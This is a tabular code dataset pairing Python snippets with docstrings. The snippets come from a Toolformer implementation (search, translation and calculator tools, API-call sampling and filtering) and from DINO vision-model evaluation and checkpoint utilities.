id int64 0 190k | prompt stringlengths 21 13.4M | docstring stringlengths 1 12k ⌀ |
|---|---|---|
161,691 | import os
class ColBERTv2:
def __init__(self, url: str):
self.url = url
def __call__(self, query, k=10):
topk = colbertv2_get_request(self.url, query, k)
topk = [doc['text'] for doc in topk]
return topk
def WikiSearch(
input_query: str,
url: str = 'http://ec2-44-228-128-229.us-west-2.compute.amazonaws.com:8893/api/search',
k: int = 10
):
retrieval_model = ColBERTv2(url)
output = retrieval_model(input_query, k)
return output | null |
161,692 | import os
def MT(input_query: str, model_name: str = "facebook/nllb-200-distilled-600M"):
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForSeq2SeqLM.from_pretrained(model_name)
input_ids = tokenizer(input_query, return_tensors='pt')
outputs = model.generate(
**input_ids,
forced_bos_token_id=tokenizer.lang_code_to_id["eng_Latn"],
)
output = tokenizer.batch_decode(outputs, skip_special_tokens=True)[0]
return output | null |
161,693 | import os
def Calculator(input_query: str):
operators = {
'+': add,
'-': sub,
'*': mul,
'/': truediv
}
if input_query.isdigit():
return float(input_query)
for c in operators.keys():
left, operator, right = input_query.partition(c)
if operator in operators:
return round(operators[operator](Calculator(left), Calculator(right)), 2) | null |
161,694 | import os
def WolframAlphaCalculator(input_query: str):
wolfram_alpha_appid = os.environ.get('WOLFRAM_ALPHA_APPID')
wolfram_client = wolframalpha.Client(wolfram_alpha_appid)
res = wolfram_client.query(input_query)
assumption = next(res.pods).text
answer = next(res.results).text
return f'Assumption: {assumption} \nAnswer: {answer}' | null |
161,695 | import os
def custom_search(query, api_key, cse_id, **kwargs):
service = build("customsearch", "v1", developerKey=api_key)
res = service.cse().list(q=query, cx=cse_id, **kwargs).execute()
return res['items']
def google_search(input_query: str, num_results: int = 10):
api_key = os.environ.get('GOOGLE_API_KEY')
cse_id = os.environ.get('GOOGLE_CSE_ID')
metadata_results = []
results = custom_search(input_query, num=num_results, api_key=api_key, cse_id=cse_id)
for result in results:
metadata_result = {
"snippet": result["snippet"],
"title": result["title"],
"link": result["link"],
}
metadata_results.append(metadata_result)
return metadata_results | null |
161,696 | import os
def _bing_search_results(
search_term: str,
bing_subscription_key: str,
count: int,
url: str = "https://api.bing.microsoft.com/v7.0/search"
):
headers = {"Ocp-Apim-Subscription-Key": bing_subscription_key}
params = {
"q": search_term,
"count": count,
"textDecorations": True,
"textFormat": "HTML",
}
response = requests.get(
url, headers=headers, params=params
)
response.raise_for_status()
search_results = response.json()
return search_results["webPages"]["value"]
def bing_search(
input_query: str,
num_results: int = 10
):
bing_subscription_key = os.environ.get("BING_API_KEY")
metadata_results = []
results = _bing_search_results(input_query, bing_subscription_key, count=num_results)
for result in results:
metadata_result = {
"snippet": result["snippet"],
"title": result["name"],
"link": result["url"],
}
metadata_results.append(metadata_result)
return metadata_results | null |
161,697 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d | null |
161,698 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def top_k(logits, thres = 0.9):
k = math.ceil((1 - thres) * logits.shape[-1])
val, indices = torch.topk(logits, k)
probs = torch.full_like(logits, -torch.finfo(logits.dtype).max)
probs.scatter_(1, indices, val)
return probs | null |
161,699 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def num_matches(substr: str, text: str):
return len(re.findall(re.escape(substr), text)) | null |
161,700 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def create_function_regex(
api_start = ' [',
api_stop = ']'
):
def has_api_calls(
text,
api_start = ' [',
api_stop = ']'
):
regex = create_function_regex(api_start, api_stop)
matches = re.findall(regex, text)
return len(matches) > 0 | null |
161,701 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def create_function_regex(
api_start = ' [',
api_stop = ']'
):
api_start_regex, api_stop_regex = map(re.escape, (api_start, api_stop))
return rf'({api_start_regex}(\w+)\(([^)]*)\))({api_stop_regex})'
def replace_all_but_first(
text: str,
api_start = ' [',
api_stop = ']'
) -> str:
regex = create_function_regex(api_start, api_stop)
count = 0
def replace_(matches):
orig_text = matches.group(0)
nonlocal count
count += 1
if count > 1:
return ''
return orig_text
return re.sub(regex, replace_, text) | null |
161,702 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def create_function_regex(
api_start = ' [',
api_stop = ']'
):
api_start_regex, api_stop_regex = map(re.escape, (api_start, api_stop))
return rf'({api_start_regex}(\w+)\(([^)]*)\))({api_stop_regex})'
def invoke_tools(
registry: dict[str, Callable],
text: str,
delimiter: str = '→',
api_start = ' [',
api_stop = ' ]'
) -> str:
regex = create_function_regex(api_start, api_stop)
replace_ = partial(replace_fn, registry, delimiter = delimiter)
return re.sub(regex, replace_, text)
def invoke_tools_on_batch_sequences(
registry: dict[str, Callable],
token_ids: torch.Tensor,
*,
encode: Callable,
decode: Callable,
delimiter: str = '→',
api_start = ' [',
api_stop = ']'
) -> torch.Tensor:
regex = create_function_regex(api_start_regex, api_stop_regex)
all_texts = [decode(one_seq_token_ids) for one_seq_token_ids in token_ids]
invoke_tools_ = partial(invoke_tools, api_start = api_start, api_stop = api_stop)
all_texts_with_api_calls = [invoke_tools_(registry, text, delimiter) for text in all_texts]
return encode(all_texts_with_api_calls) | null |
161,703 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def find_indices_of(t: torch.Tensor, token_id: int, occurrence = 1):
assert occurrence > 0
mask = (t == token_id)
has_occurred = mask.cumsum(dim = -1)
has_occurred = F.pad(has_occurred, (1, 0), value = 0.)
return (has_occurred < occurrence).sum(dim = -1).long()
def sample(
model: nn.Module,
*,
seq_len,
prime: Optional[torch.Tensor] = None,
positions: Optional[torch.Tensor] = None,
batch_size = 1,
eos_token_id = None,
sos_token_id = 1,
temperature = 0.,
pad_id = 0,
call_api_only_once = False,
api_start_token_id = None,
auto_select_api_start_token_when_topk = False,
select_api_start_id_top_k = 10,
):
device = next(model.parameters()).device
max_seq_len = seq_len + 1
# validate
if call_api_only_once:
assert exists(api_start_token_id)
# prime
if exists(prime):
batch_size, prime_length = prime.shape
else:
prime_length = 1
prime = torch.full((batch_size, 1), sos_token_id, device = device, dtype = torch.long)
prime = prime.to(device)
# sampling positions - different sequences have different cursors
if exists(positions):
positions = positions.clone()
else:
positions = torch.zeros((batch_size,), device = device, dtype = torch.long)
assert (positions <= (prime_length + 1)).all() and (positions <= max_seq_len).all(), 'all positions must be less then initial prime length as well as the total sequence length + 1 (plus one for noop if one sequence finished sampling before the other)'
# eval model
model.eval()
# lengthen the prime to the entire sequence length
remain_iterations = seq_len - prime_length
output = F.pad(prime, (0, max_seq_len - prime_length), value = 0.)
batch_indices = torch.arange(batch_size, device = device)
batch_indices = rearrange(batch_indices, 'b -> b 1')
position_indices = rearrange(positions, 'b -> b 1')
# determine the <api> token mask, for making sure api is called only once, masking out logit to prevent it from being selected for those rows which already contains an <api> token
api_token_mask = None # lazily created, since do not know logit dimensions
def create_api_token_mask(num_tokens, api_start_token_id):
mask = torch.zeros((1, 1, num_tokens), dtype = torch.bool)
assert api_start_token_id < num_tokens
mask[..., api_start_token_id] = True
return mask
# start iterating
for iteration in tqdm(range(remain_iterations)):
logits = model(output)
last_logits = logits[batch_indices, position_indices]
# this will ensure that each batch token sequence will have at most one <api> token
if call_api_only_once:
if not exists(api_token_mask):
num_tokens = last_logits.shape[-1]
api_token_mask = create_api_token_mask(num_tokens, api_start_token_id)
api_token_mask = api_token_mask.to(device)
api_called = (output == api_start_token_id).any(dim = -1)
logit_mask = api_token_mask & rearrange(api_called, 'b -> b 1 1')
last_logits = last_logits.masked_fill(logit_mask, -torch.finfo(last_logits.dtype).max)
# greedy sample (but could be made non-greedy)
sampled = gumbel_sample(last_logits, temperature = temperature)
# for those sequences without an api call, if the api_start_token_id is within top k (set to 10 in paper) of logits, just auto-select
# seems to be an important hack in the paper
# it seems like this paper will take a lot more follow up research to be viable
if auto_select_api_start_token_when_topk:
top_token_ids = last_logits.topk(select_api_start_id_top_k, dim = -1).indices
has_api_token_in_topk = (top_token_ids == api_start_token_id).any(dim = -1)
should_auto_select_api_token = has_api_token_in_topk & ~rearrange(api_called, 'b -> b 1')
sampled = sampled.masked_fill(should_auto_select_api_token, api_start_token_id)
# set the sampled tokens at the right curosr positions
output[batch_indices, position_indices] = sampled
# increment positions
position_indices += 1
position_indices.clamp_(max = seq_len) # noop if one sequence is further along and near the end
# if using <eos> tokens, look for all sequences having it and terminate, also anything after <eos> will be padded
if exists(eos_token_id):
eos_mask = (output == eos_token_id)
all_rows_have_eos = eos_mask.any(dim = -1).all()
if all_rows_have_eos:
keep_mask = eos_mask.cumsum(dim = -1) == 0
keep_mask = F.pad(keep_mask, (1, 0), value = True)
output = output.masked_fill(~keep_mask, pad_id)
break
# remove the last token in output (use as noop placeholder)
output = output[:, :-1]
return output
def sample_with_api_call(
model: nn.Module,
*,
seq_len,
call_apis: Callable,
prime: torch.Tensor,
api_end_token_id: int,
occurrence = 1,
**kwargs
):
sampled = sample(
model = model,
prime = prime,
seq_len = seq_len,
**kwargs
)
sampled = call_apis(sampled)
sampled_seq_len = sampled.shape[-1]
null_positions = sampled_seq_len # handle sequences that do not have api calls
pos_starting_at_end_of_api = find_indices_of(
sampled,
api_end_token_id,
occurrence = occurrence
)
resample_after_api_calls = sample(
model = model,
prime = sampled,
seq_len = sampled_seq_len,
positions = (pos_starting_at_end_of_api + 1).clamp(max = null_positions), # start at the position right after the </api>
**kwargs
)
return resample_after_api_calls | null |
161,704 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def log(t, eps = 1e-20):
return t.clamp(min = eps).log()
def all_contains_id(t: torch.Tensor, token_id: int):
mask = t == token_id
return mask.any(dim = -1).all()
def default_weight_fn(t):
# following the formula in section 4.1 - however, not sure what w_s is in the denominator
# if t stands for each timestep, this would also mean within 5 tokens it would diminish to 0?
return (1. - t * 0.2).clamp(min = 0.)
def get_pred_prob(token_ids, logits):
logits = logits[:, :-1] # logits of each token... (omit last logit)
token_ids = token_ids[:, 1:] # predicts the next token id (omit first token id)
token_ids = rearrange(token_ids, 'b n -> b n 1')
probs = logits.softmax(dim = -1)
correct_token_id_pred_prob = probs.gather(-1, token_ids)
return rearrange(correct_token_id_pred_prob, 'b n 1 -> b n')
def weight_and_mask(
token_ids: torch.Tensor,
token_id: int,
pad_id = -1,
weighting_fn: Callable = default_weight_fn
):
t = get_arange_start_at_token_id(token_ids, token_id, pad_id)
weights = weighting_fn(t)
return weights.masked_fill(t == pad_id, 0.)
FilteredResults = namedtuple('FilteredResults', [
'num_passed',
'num_failed',
'selected_indices',
'selected_mask',
'filtered_tokens',
'filtered_tokens_without_api_response',
'filtered_tokens_with_api_response'
])
def filter_tokens_with_api_response(
model: nn.Module, # the language model should accept the token ids below and return the logits in shape (batch, seq, num tokens)
*,
tokens: torch.Tensor, # token ids (batch, seq) of the original passage, without api calls
tokens_without_api_response: torch.Tensor, # token ids (batch, seq) of the passage, but with the api call (but without a response filled in) - <api>tool1(x, y)</api>
tokens_with_api_response: torch.Tensor, # token ids (batch, seq) of the passage with api call and the response - <api>tool1(x, y) → {response}</api>
api_start_token_id: int, # token id of the <api> tag
api_end_token_id: int, # token id of the </api> tag
filter_threshold: float = 1., # the threshold at which to accept the sampled api call (tokens_with_api_response) for fine-tuning
weighting_fn: Callable = default_weight_fn # weighting function
) -> FilteredResults:
# validations
assert all([*map(lambda t: t.dtype == torch.long, (tokens, tokens_with_api_response, tokens_without_api_response))])
assert all_contains_id(tokens_without_api_response, api_start_token_id)
assert all_contains_id(tokens_without_api_response, api_end_token_id)
assert all_contains_id(tokens_with_api_response, api_start_token_id)
assert all_contains_id(tokens_with_api_response, api_end_token_id)
# auto set devices
device = next(model.parameters()).device
tokens, tokens_without_api_response, tokens_with_api_response = map(lambda t: t.to(device), (tokens, tokens_without_api_response, tokens_with_api_response))
# get all the logits
with torch.no_grad():
model.eval()
logits, logits_without_api_response, logits_with_api_response = map(model, (tokens, tokens_without_api_response, tokens_with_api_response))
# derive all predicted prob of the actual next token id in sequence
probs = get_pred_prob(tokens, logits)
probs_without_api_response = get_pred_prob(tokens_without_api_response, logits_without_api_response)
probs_with_api_response = get_pred_prob(tokens_with_api_response, logits_with_api_response)
weight_and_mask_fn = partial(weight_and_mask, weighting_fn = weighting_fn)
# derive the weighting
weight_without_api_response = weight_and_mask_fn(tokens_without_api_response[:, :-1], api_end_token_id)
weight_with_api_response = weight_and_mask_fn(tokens_with_api_response[:, :-1], api_end_token_id)
# deriving the weighting for the original passage is more tricky
# would need to start counting up from <api> start token location
# this would also assume that the language model perfectly copied the passage over and that both token ids are aligned except for the inserted API call - but this can be done with the custom filtering functions eventually
weight = weight_and_mask_fn(tokens_without_api_response[:, 1:], api_start_token_id) # shift to the left by one since <api> does not exist in the original sequence
weight = weight[:, :probs.shape[-1]]
# get the loss L for all three types of sequences
def loss_fn(weight, probs):
return (weight * -log(probs)).sum(dim = -1)
loss = loss_fn(weight, probs)
loss_without_api_response = loss_fn(weight_without_api_response, probs_without_api_response)
loss_with_api_response = loss_fn(weight_with_api_response, probs_with_api_response)
# calculate the main formula in the paper
# loss+ = loss with api response
# loss- = min(loss without api response, loss without api at all)
loss_plus = loss_with_api_response
loss_minus = torch.minimum(loss_without_api_response, loss)
selected_mask = (loss_minus - loss_plus) >= filter_threshold
# now we can select and return the entries that survived the filtering stage
# also returning the selected indices of the batch being processed
# for finetuning the model into toolformer
batch = tokens.shape[0]
indices = torch.arange(batch, device = tokens.device)
selected_indices = indices[selected_mask]
ret = FilteredResults(
selected_mask.sum().item(),
(~selected_mask).sum().item(),
selected_indices,
selected_mask,
tokens[selected_mask],
tokens_without_api_response[selected_mask],
tokens_with_api_response[selected_mask]
)
return ret | null |
161,705 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def prompt_collate_fn(data, padding_value = 0):
prompts, prompt_lengths = zip(*data)
prompts = pad_sequence(prompts, padding_value = padding_value)
return prompts, torch.stack(prompt_lengths)
def PromptDataloader(ds: Dataset, *args, padding_value = 0, **kwargs):
collate_fn = partial(prompt_collate_fn, padding_value = padding_value)
return DataLoader(ds, *args, collate_fn = collate_fn, **kwargs) | null |
161,706 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
pad_sequence = partial(pad_sequence, batch_first = True)
def FinetuneDataloader(ds: Dataset, *args, padding_value = 0, **kwargs):
return DataLoader(ds, *args, collate_fn = partial(pad_sequence, padding_value = padding_value), **kwargs) | null |
161,707 | from torch.optim import AdamW, Adam
def separate_weight_decayable_params(params):
def get_optimizer(
params,
lr = 1e-4,
wd = 1e-2,
betas = (0.9, 0.99),
eps = 1e-8,
filter_by_requires_grad = False,
group_wd_params = True,
**kwargs
):
has_weight_decay = wd > 0
if filter_by_requires_grad:
params = list(filter(lambda t: t.requires_grad, params))
if group_wd_params and has_weight_decay:
wd_params, no_wd_params = separate_weight_decayable_params(params)
params = [
{'params': wd_params},
{'params': no_wd_params, 'weight_decay': 0},
]
adam_kwargs = dict(lr = lr, betas = betas, eps = eps)
if not has_weight_decay:
return Adam(params, **adam_kwargs)
return AdamW(params, weight_decay = wd, **adam_kwargs) | null |
161,708 | import torch
from torch import nn, einsum
from einops import rearrange
from x_clip.tokenizer import tokenizer
def rotate_half(x):
x = rearrange(x, "... (j d) -> ... j d", j=2)
x1, x2 = x.unbind(dim=-2)
return torch.cat((-x2, x1), dim=-1)
def apply_rotary_pos_emb(pos, t):
return (t * pos.cos()) + (rotate_half(t) * pos.sin()) | null |
161,709 | import os
import sys
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import datasets
from torchvision import transforms as pth_transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
def extract_features(model, data_loader, use_cuda=True, multiscale=False):
class ReturnIndexDataset(datasets.ImageFolder):
def __getitem__(self, idx):
def extract_feature_pipeline(args):
# ============ preparing data ... ============
transform = pth_transforms.Compose([
pth_transforms.Resize(256, interpolation=3),
pth_transforms.CenterCrop(224),
pth_transforms.ToTensor(),
pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
])
dataset_train = ReturnIndexDataset(os.path.join(args.data_path, "train"), transform=transform)
dataset_val = ReturnIndexDataset(os.path.join(args.data_path, "val"), transform=transform)
sampler = torch.utils.data.DistributedSampler(dataset_train, shuffle=False)
data_loader_train = torch.utils.data.DataLoader(
dataset_train,
sampler=sampler,
batch_size=args.batch_size_per_gpu,
num_workers=args.num_workers,
pin_memory=True,
drop_last=False,
)
data_loader_val = torch.utils.data.DataLoader(
dataset_val,
batch_size=args.batch_size_per_gpu,
num_workers=args.num_workers,
pin_memory=True,
drop_last=False,
)
print(f"Data loaded with {len(dataset_train)} train and {len(dataset_val)} val imgs.")
# ============ building network ... ============
if "vit" in args.arch:
model = vits.__dict__[args.arch](patch_size=args.patch_size, num_classes=0)
print(f"Model {args.arch} {args.patch_size}x{args.patch_size} built.")
elif "xcit" in args.arch:
model = torch.hub.load('facebookresearch/xcit:main', args.arch, num_classes=0)
elif args.arch in torchvision_models.__dict__.keys():
model = torchvision_models.__dict__[args.arch](num_classes=0)
model.fc = nn.Identity()
else:
print(f"Architecture {args.arch} non supported")
sys.exit(1)
model.cuda()
utils.load_pretrained_weights(model, args.pretrained_weights, args.checkpoint_key, args.arch, args.patch_size)
model.eval()
# ============ extract features ... ============
print("Extracting features for train set...")
train_features = extract_features(model, data_loader_train, args.use_cuda)
print("Extracting features for val set...")
test_features = extract_features(model, data_loader_val, args.use_cuda)
if utils.get_rank() == 0:
train_features = nn.functional.normalize(train_features, dim=1, p=2)
test_features = nn.functional.normalize(test_features, dim=1, p=2)
train_labels = torch.tensor([s[-1] for s in dataset_train.samples]).long()
test_labels = torch.tensor([s[-1] for s in dataset_val.samples]).long()
# save features and labels
if args.dump_features and dist.get_rank() == 0:
torch.save(train_features.cpu(), os.path.join(args.dump_features, "trainfeat.pth"))
torch.save(test_features.cpu(), os.path.join(args.dump_features, "testfeat.pth"))
torch.save(train_labels.cpu(), os.path.join(args.dump_features, "trainlabels.pth"))
torch.save(test_labels.cpu(), os.path.join(args.dump_features, "testlabels.pth"))
return train_features, test_features, train_labels, test_labels | null |
161,710 | import os
import sys
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import datasets
from torchvision import transforms as pth_transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
def knn_classifier(train_features, train_labels, test_features, test_labels, k, T, num_classes=1000):
top1, top5, total = 0.0, 0.0, 0
train_features = train_features.t()
num_test_images, num_chunks = test_labels.shape[0], 100
imgs_per_chunk = num_test_images // num_chunks
retrieval_one_hot = torch.zeros(k, num_classes).to(train_features.device)
for idx in range(0, num_test_images, imgs_per_chunk):
# get the features for test images
features = test_features[
idx : min((idx + imgs_per_chunk), num_test_images), :
]
targets = test_labels[idx : min((idx + imgs_per_chunk), num_test_images)]
batch_size = targets.shape[0]
# calculate the dot product and compute top-k neighbors
similarity = torch.mm(features, train_features)
distances, indices = similarity.topk(k, largest=True, sorted=True)
candidates = train_labels.view(1, -1).expand(batch_size, -1)
retrieved_neighbors = torch.gather(candidates, 1, indices)
retrieval_one_hot.resize_(batch_size * k, num_classes).zero_()
retrieval_one_hot.scatter_(1, retrieved_neighbors.view(-1, 1), 1)
distances_transform = distances.clone().div_(T).exp_()
probs = torch.sum(
torch.mul(
retrieval_one_hot.view(batch_size, -1, num_classes),
distances_transform.view(batch_size, -1, 1),
),
1,
)
_, predictions = probs.sort(1, True)
# find the predictions that match the target
correct = predictions.eq(targets.data.view(-1, 1))
top1 = top1 + correct.narrow(1, 0, 1).sum().item()
top5 = top5 + correct.narrow(1, 0, min(5, k)).sum().item() # top5 does not make sense if k < 5
total += targets.size(0)
top1 = top1 * 100.0 / total
top5 = top5 * 100.0 / total
return top1, top5 | null |
161,711 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def load_pretrained_weights(model, pretrained_weights, checkpoint_key, model_name, patch_size):
if os.path.isfile(pretrained_weights):
state_dict = torch.load(pretrained_weights, map_location="cpu")
if checkpoint_key is not None and checkpoint_key in state_dict:
print(f"Take key {checkpoint_key} in provided checkpoint dict")
state_dict = state_dict[checkpoint_key]
# remove `module.` prefix
state_dict = {k.replace("module.", ""): v for k, v in state_dict.items()}
# remove `backbone.` prefix induced by multicrop wrapper
state_dict = {k.replace("backbone.", ""): v for k, v in state_dict.items()}
msg = model.load_state_dict(state_dict, strict=False)
print('Pretrained weights found at {} and loaded with msg: {}'.format(pretrained_weights, msg))
else:
print("Please use the `--pretrained_weights` argument to indicate the path of the checkpoint to evaluate.")
url = None
if model_name == "vit_small" and patch_size == 16:
url = "dino_deitsmall16_pretrain/dino_deitsmall16_pretrain.pth"
elif model_name == "vit_small" and patch_size == 8:
url = "dino_deitsmall8_pretrain/dino_deitsmall8_pretrain.pth"
elif model_name == "vit_base" and patch_size == 16:
url = "dino_vitbase16_pretrain/dino_vitbase16_pretrain.pth"
elif model_name == "vit_base" and patch_size == 8:
url = "dino_vitbase8_pretrain/dino_vitbase8_pretrain.pth"
elif model_name == "xcit_small_12_p16":
url = "dino_xcit_small_12_p16_pretrain/dino_xcit_small_12_p16_pretrain.pth"
elif model_name == "xcit_small_12_p8":
url = "dino_xcit_small_12_p8_pretrain/dino_xcit_small_12_p8_pretrain.pth"
elif model_name == "xcit_medium_24_p16":
url = "dino_xcit_medium_24_p16_pretrain/dino_xcit_medium_24_p16_pretrain.pth"
elif model_name == "xcit_medium_24_p8":
url = "dino_xcit_medium_24_p8_pretrain/dino_xcit_medium_24_p8_pretrain.pth"
elif model_name == "resnet50":
url = "dino_resnet50_pretrain/dino_resnet50_pretrain.pth"
if url is not None:
print("Since no pretrained weights have been provided, we load the reference pretrained DINO weights.")
state_dict = torch.hub.load_state_dict_from_url(url="https://dl.fbaipublicfiles.com/dino/" + url)
model.load_state_dict(state_dict, strict=True)
else:
print("There is no reference weights available for this model => We use random weights.") | null |
161,712 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def load_pretrained_linear_weights(linear_classifier, model_name, patch_size):
url = None
if model_name == "vit_small" and patch_size == 16:
url = "dino_deitsmall16_pretrain/dino_deitsmall16_linearweights.pth"
elif model_name == "vit_small" and patch_size == 8:
url = "dino_deitsmall8_pretrain/dino_deitsmall8_linearweights.pth"
elif model_name == "vit_base" and patch_size == 16:
url = "dino_vitbase16_pretrain/dino_vitbase16_linearweights.pth"
elif model_name == "vit_base" and patch_size == 8:
url = "dino_vitbase8_pretrain/dino_vitbase8_linearweights.pth"
elif model_name == "resnet50":
url = "dino_resnet50_pretrain/dino_resnet50_linearweights.pth"
if url is not None:
print("We load the reference pretrained linear weights.")
state_dict = torch.hub.load_state_dict_from_url(url="https://dl.fbaipublicfiles.com/dino/" + url)["state_dict"]
linear_classifier.load_state_dict(state_dict, strict=True)
else:
print("We use random linear weights.") | null |
161,713 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def clip_gradients(model, clip):
norms = []
for name, p in model.named_parameters():
if p.grad is not None:
param_norm = p.grad.data.norm(2)
norms.append(param_norm.item())
clip_coef = clip / (param_norm + 1e-6)
if clip_coef < 1:
p.grad.data.mul_(clip_coef)
return norms | null |
161,714 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def cancel_gradients_last_layer(epoch, model, freeze_last_layer):
if epoch >= freeze_last_layer:
return
for n, p in model.named_parameters():
if "last_layer" in n:
p.grad = None | null |
161,715 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
The provided code snippet includes necessary dependencies for implementing the `restart_from_checkpoint` function. Write a Python function `def restart_from_checkpoint(ckp_path, run_variables=None, **kwargs)` to solve the following problem:
Re-start from checkpoint
Here is the function:
def restart_from_checkpoint(ckp_path, run_variables=None, **kwargs):
"""
Re-start from checkpoint
"""
if not os.path.isfile(ckp_path):
return
print("Found checkpoint at {}".format(ckp_path))
# open checkpoint file
checkpoint = torch.load(ckp_path, map_location="cpu")
# key is what to look for in the checkpoint file
# value is the object to load
# example: {'state_dict': model}
for key, value in kwargs.items():
if key in checkpoint and value is not None:
try:
msg = value.load_state_dict(checkpoint[key], strict=False)
print("=> loaded '{}' from checkpoint '{}' with msg {}".format(key, ckp_path, msg))
except TypeError:
try:
msg = value.load_state_dict(checkpoint[key])
print("=> loaded '{}' from checkpoint: '{}'".format(key, ckp_path))
except ValueError:
print("=> failed to load '{}' from checkpoint: '{}'".format(key, ckp_path))
else:
print("=> key '{}' not found in checkpoint: '{}'".format(key, ckp_path))
# re load variable important for the run
if run_variables is not None:
for var_name in run_variables:
if var_name in checkpoint:
run_variables[var_name] = checkpoint[var_name] | Re-start from checkpoint |
161,716 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
